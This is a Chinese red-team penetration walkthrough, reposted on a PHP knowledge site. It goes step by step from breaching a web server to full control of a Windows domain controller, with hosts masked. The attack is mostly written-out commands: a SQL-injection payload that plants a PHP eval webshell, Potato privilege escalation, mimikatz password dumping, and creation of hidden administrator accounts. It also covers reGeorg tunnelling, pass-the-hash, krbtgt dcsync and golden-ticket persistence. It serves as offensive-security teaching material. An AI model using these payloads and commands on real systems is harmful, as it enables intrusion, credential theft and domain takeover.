IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 红队攻防之从边界突破到漫游内网(无cs和msf) -> 正文阅读

[PHP知识库]红队攻防之从边界突破到漫游内网(无cs和msf)

前言

网络安全的本质:懂进攻,知防守,先正向,后逆向。

本篇文章目录

在这里插入图片描述

网络拓扑图:

本次红队攻防实战所需绘制的拓扑图如下:
在这里插入图片描述

边界突破

访问网站:

http://xxx.xxx.xxx/?id=1

首页如下:
在这里插入图片描述

SQL注入拿shell

构造payload:and 1=1显示正确,and 1=2显示错误,说明存在SQL注入,并且爆出绝对路径
在这里插入图片描述
使用常用的注入函数into outfile 将一句话木马写入自动创建的 xxx.php文件中

http://xxx.xxx.xxx/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[xxx]);?>' into outfile 'x:\\xxx\\xxx\\xxx.php'

需要有写入权限和上一步爆出的绝对路径
在这里插入图片描述
验证上传的木马是否成功,成功写入木马

http://xxx.xxx.xxx/xxx.php?xxx=phpinfo();

在这里插入图片描述

成功利用蚁剑拿到shell

在这里插入图片描述

→点击获取网络安全学习资料·攻略←

2000多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

内网信息收集

whoami
发现是普通用户的权限
在这里插入图片描述
ipconfig /all
查看用户的IP信息,可以看到位于工作组环境
在这里插入图片描述
route print
查看路由,通往10.0.1网段
在这里插入图片描述
net config Workstation
查看计算机名、全名、用户名、系统版本、工作站
在这里插入图片描述
.利用蚁剑传入Potato提权工具,并使用其虚拟终端,查看权限,提权。
将超时时间调大:
在这里插入图片描述
上传Potato提权工具成功,改名为xxx.exe
在这里插入图片描述
使用命令可以看到成功提权
xxx.exe -p “whoami”
在这里插入图片描述
将mimikatz改名为x.exe,成功上传
在这里插入图片描述
然后在终端执行

xxx.exe -p "x.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt"

在这里插入图片描述
查看log.txt,成功抓到当前用户和另一用户的密码

在这里插入图片描述

在这里插入图片描述
netstat -ano查看是否开启3389端口,发现已开启
在这里插入图片描述
查看防火墙是开启的
netsh firewall show state
在这里插入图片描述

reGeorg内网穿透

使用软件reGeorg实现攻击机与目标机器的通信
通过蚁剑将reGeorge中的tunnel.php上传至网站改名为tu.php
在这里插入图片描述

并成功访问

http://xx.xx.xx/tu.php

在这里插入图片描述
启动reGeorg

python3 xx.py -k xxx -u http://xx.xx.xx/tu.php

表示本地1080端口的流量都转发给指定的那个url,1080是指定的监听端口;
在这里插入图片描述
代理可以使用:
在这里插入图片描述

内网渗透

拿下边界服务器
挂上代理远程连接10.0.1.4
在这里插入图片描述
创建新账号admin 并提权

xx.exe -p "net user xxx xxxx /add" //新增账号和对应密码
xx.exe -p "net localgroup administrators xxxx /add"//提升新增账号的权限至administrators组

在这里插入图片描述
远程连接
在这里插入图片描述
成功连接
在这里插入图片描述
将mimikatz添加到桌面并以管理员权限运行
privilege::debug 提升权限
log 日志会记录内容
sekurlsa::logonpasswords 抓取密码
在这里插入图片描述
成功抓到管理员账户密码:
使用上述管理员账号密码,成功登陆服务器
在这里插入图片描述
通过nbtscan对当前C端进行扫描,发现还有三台机器存活
在这里插入图片描述

拿下域内主机

根据我这个渗透时长两年半的个人练习生的经验来判断,内网里的服务器的账号密码有部分可能是相同的。
再使用上述管理员账号密码远程连接10.0.1.8

在这里插入图片描述
成功连接
在这里插入图片描述
whoami查看是administrator权限
ipconfig /all查看有域xx.xx
在这里插入图片描述
一般DNS服务器就是域控服务器
在这里插入图片描述
查询域控主机名,遭拒绝,需利用官方工具将账号提升至system权限,再查
net user /domain

在这里插入图片描述
上传官方工具PsExec.exe提权
PsExec.exe -i -s -d cmd 提升至system权限,获取主机名DC.xx.xx
在这里插入图片描述
尝试访问域控主机C盘
dir \DC.xx.xx\c$
在这里插入图片描述
是拒绝的,需要工具minikatz,使用哈希传递

拿下域控

将mimikatz添加到桌面并以管理员权限运行
privilege::debug 提升权限
log 日志会记录内容
sekurlsa::logonpasswords 抓取密码
在这里插入图片描述
获取

user=administrator
Domain=xxx
NTLM=xxxxxxx

将上述值放入下方命令中,完成哈希传递,以后利用这个CMD窗口运行,拥有管理员权限。

sekurlsa::pth /user:administrator /domain:"xx.xx"
/ntlm:xxxxxxx

启动域控主机cmd窗口,成功访问域控主机C盘
dir \DC.xx.xx\c$
在这里插入图片描述
使用官方工具PsExec.exe,命令如下:
PsExec.exe \dc.xx.xx cmd
进入c:
输入ipconfig, 10.0.1.6为域控ip,此时成功获取域控cmd
在这里插入图片描述
新建账号,直接远程登陆域控主机

"net user xxx xxxx /add" //新增账号和对应密码
"net localgroup administrators xxxx /add"//提升新增账号的权限至administrators组

在这里插入图片描述
建好账号后,直接登陆域控主机10.0.1.6(DC.xx.xx),成功拿下域控主机权限
在这里插入图片描述
至此已成功拿下三台主机的权限。
在这里插入图片描述

权限维持

可通过制作黄金票据进行权限维持
因为域控主机10.0.1.6安装了补丁KB2871997,所以无法抓取到明文密码
管理员运行猕猴桃
log 日志记录内容
lsadump::dcsync /user:krbtgt 获取内容
在这里插入图片描述
获取krbtgt账号的关键值(OSID和Hash_NTLM)
在这里插入图片描述
制作黄金票据

kerberos::golden /admin:administrator /domain:xx.xx /sid:xx-xx-xx /krbtgt:xxxxxx /ticket:xxx.kiribi

如图
在这里插入图片描述
票据加载成功
在这里插入图片描述
普通窗口无法访问域控根目录
在这里插入图片描述
把域控中的票据复制到在10.0.1.8主机中,使用猕猴桃加载票据
kerberos::ptt xxx.kiribi 加载票据
在这里插入图片描述
然后成功在普通cmd中访问域控c盘内容
dir \DC.xx.xx\c$
在这里插入图片描述
PExec.exe \DC.xx.xx cmd 获取域控cmd
在这里插入图片描述

结语

一名优秀的白帽子,是不能有短板的,有的只能是几块长板和很多的标准板。

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-12-06 15:03:32  更:2021-12-06 15:03:42 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/14 14:41:28-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码